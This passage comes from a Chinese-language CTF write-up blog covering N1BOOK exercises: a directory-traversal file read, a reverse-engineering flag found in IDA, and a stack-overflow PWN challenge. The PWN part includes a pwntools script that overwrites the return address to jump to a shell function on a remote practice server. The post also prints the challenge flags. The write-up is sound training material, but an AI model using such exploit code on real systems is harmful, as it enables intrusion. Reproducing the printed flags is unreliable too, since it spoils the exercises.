<li>右键查看源码<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201115235644275-1101729838.png">  </li>
<li>查看img目录<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201115235800682-1951172374.png">  </li>
<li>目录穿越<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201115235824630-1004736249.png">  </li>
<li>下载flag，用记事本打开即可  <blockquote>
<p>n1book{afr_2_solved}</p>
</blockquote>
</li>
</ol>
<h2 id="第五章-CTF之RE章-Hello-RE"><a href="#第五章-CTF之RE章-Hello-RE" class="headerlink" title="[第五章 CTF之RE章]Hello, RE"></a>[第五章 CTF之RE章]Hello, RE</h2><p>直接拖到ida64反编译即可看到flag<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111115333510-1380860265.png">  </p>
<blockquote>
<p>n1book{Welcome_to_reversing_world!}  </p>
</blockquote>
<h2 id="第六章-CTF之PWN章-stack"><a href="#第六章-CTF之PWN章-stack" class="headerlink" title="[第六章 CTF之PWN章]stack"></a>[第六章 CTF之PWN章]stack</h2><p>题目提供了libc-2.27.so和stack，根据经验知道这题环境是Ubuntu18，需要进行堆栈平衡  </p>
<ol>
<li><code>checksec stack</code><br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111204026170-317361439.png">  </li>
<li>IDA64反编译，并查看<code>main</code>函数  </li>
</ol>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> __cdecl <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  vuln(*(_QWORD *)&amp;argc, argv, envp);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<ol start="3">
<li>进一步查看<code>vuln</code>，发现栈溢出漏洞<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111204429141-497488314.png">  </li>
<li>双击变量<code>v1</code>查看栈信息，所以当覆盖<code>&#39;a&#39;*18</code>后即可到达函数返回地址<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111204527280-1969476305.png">  </li>
<li>同时注意到IDA64的函数窗口有个<code>shell</code>，查看以下发现<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111204818419-1089495331.png">  </li>
<li>所以需要将<code>shell</code>的地址0x覆盖到<code>vuln</code>的返回地址即可。由于前面提到需要堆栈平衡，我们还要知道shell的ret地址<br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111205501285-1592593146.png"><br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111205403033-1732093910.png">  </li>
<li>综上，有exp如下  </li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#p = process(&#x27;./stack&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node3.buuoj.cn&#x27;</span>, <span class="number">25413</span>)</span><br><span class="line">shell = <span class="number">0x400537</span></span><br><span class="line">retn = <span class="number">0x40054e</span></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span> * <span class="number">18</span> + p64(retn) + p64(shell)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()         </span><br></pre></td></tr></table></figure>

<ol start="8">
<li><code>python exp.py</code><br><img src="https://img2020.cnblogs.com/blog/1931211/202011/1931211-20201111205701121-1124011515.png">  <blockquote>
<p>n1book{851939e4e90b864b8d20fe6228564522}</p>
</blockquote>
</li>
</ol>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/N1BOOK/" rel="tag"># N1BOOK</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
            </div>
            <div class="post-nav-item">
                <a href="/2021/03/20/SUS2021-WP/" rel="next" title="SUS2021-WP">
                  SUS2021-WP <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>





<script src="/js/comments.js"></script>
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">WooPokyuk</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>
-->

    </div>
  </footer>

  
  <script size="90" alpha="0.4" zIndex="-2" src="https://cdn.jsdelivr.net/npm/ribbon.js@1.0.2/dist/ribbon.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  
<script src="/js/third-party/search/local-search.js"></script>






  





</body>
</html>
